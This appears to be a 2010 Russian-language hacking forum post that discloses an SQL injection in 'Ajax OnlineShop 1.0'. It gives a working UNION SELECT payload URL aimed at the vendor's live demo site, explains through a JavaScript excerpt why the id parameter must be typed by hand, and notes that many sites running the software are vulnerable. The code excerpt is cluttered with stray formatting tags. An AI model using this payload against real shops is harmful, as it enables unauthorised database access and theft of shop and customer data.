13.11.2010, 11:31
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Ajax OnlineShop 1.0
SQL Injection
оффсайт:
Код:
http://www.ajax-onlineshop.de/demo/index.php?id=4997+UNION+SELECT+1,2,3,version%28%29,5,6,7,8%20--+#seo_loaded%28-4997%29
параметр index.php?id= прийдется дописывать самому из за функции:document.URL.split
PHP код:
[COLOR="#000000"]// if get id in url but no #
if ( ([COLOR="#0000BB"][/COLOR] != 0) && (![COLOR="#0000BB"][/COLOR]) && (document.URL.search(/#.+/) == -1) ) {
wohinJS = 'reload';
var start_name = document.URL.split ('?id=');
var hist_event_name = start_name[0] + "(" + start_name[1] + ")"; // generate history-event-name
addHistoryEvent('seo_loaded('+ start_name[1] +')', start_name[1]); // load requested page
}
else {
var start_name = document.URL.split ('#');
[COLOR="#0000BB"]
[/COLOR] if (start_name[1]) { // exist history-ID in url...
wohinJS = 'reload';
start_name = start_name[1].split ('('); // ...yes, split the name
var start_id = filterZahl(start_name[1]); // extract the id // del wenn sicher: filterZahl(start_url)
//$('log').innerHTML = start_name[0] + " - " + start_id; // testing
var hist_event_name = start_name[0] + "(" + start_id + ")"; // generate history-event-name
addHistoryEvent(hist_event_name, start_id); // load requested page
}
else { // ...no, then load shop-startpage
[COLOR="#0000BB"][/COLOR][/COLOR]
уязвимы все сайты,их достаточно много
|
|
|